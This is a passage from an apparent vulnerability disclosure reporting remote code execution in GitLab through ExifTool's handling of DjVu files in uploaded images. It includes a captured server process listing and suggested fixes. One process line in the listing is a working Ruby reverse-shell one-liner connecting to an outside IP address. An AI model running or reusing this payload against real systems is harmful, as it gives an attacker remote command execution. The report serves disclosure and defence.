PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit 